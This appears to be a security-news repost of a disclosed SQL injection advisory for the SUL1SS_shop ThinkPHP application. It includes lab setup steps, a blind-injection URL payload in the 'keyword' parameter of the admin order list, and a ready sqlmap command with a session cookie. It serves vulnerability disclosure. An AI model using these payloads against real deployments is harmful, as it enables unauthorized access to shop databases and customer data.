Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-1276: SUL1SS_shop_SQLi-这里是一个普通学生的博客

A vulnerability, which was classified as critical, has been found in SUL1SS_shop. This issue affects some unknown processing of the file application\merch\controller\Order.php. The manipulation of the argument keyword leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-222599.

CVE
#sql#vulnerability#web#git#php

SQLi Vulnerability in SUL1SS_shop

Project: https://github.com/617746883/thinkphp5.0_shop

A shop application developed by ThinkPHP5

Download and deploy in the web directory, and import the database file (install.sql)

Before starting, if you need to install the system, you may need to modify the database file (install.sql) to allow you to log in.

'admin', 'f374baf63f70a5c2c4d172a0a6e37897', 'U66yPU04'

modify it to

'admin', 'a7da35830936caa0258da1c26c42d6ff', 'lVRVVp9g'

In this way, the password becomes 123456, and you can start testing the vulnerability.

(Since this vulnerability exists in the background, it cannot be exploited if you do not know the password.)

Visit and log in to the background, for example: http://192.168.159.133:8080/index.php/admin/login/index.html

Username:admin

Password:123456

Vulnerable file: application\merch\controller\Order.php

The $keyword variable is passed in by the GET method. When other variables meet the judgment conditions, it can finally be spliced into the SQL statement to cause SQL injection.

The resulting SQL statement is executed, resulting in blind injection.

Payload:

http://192.168.159.133:8080/index.php/admin/order/olist_all.html?paytype=&searchtime=&time[start]=2023-02-04+15%3A02&time[end]=2023-03-04+15%3A02&searchfield=ordersn&keyword=1%27&export=0

sqlmap payload(Replace the cookie with your own):

sqlmap -u "http://192.168.159.133:8080/index.php/admin/order/olist_all.html?paytype=&searchtime=&time%5Bstart%5D=2023-02-04+15%3A02&time%5Bend%5D=2023-03-04+15%3A02&searchfield=ordersn&keyword=1*&export=0" --cookie="thinkphp_show_page_trace=0|0; login%40=60ae28k2vl20sg2gi9reljav61" --current-user

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907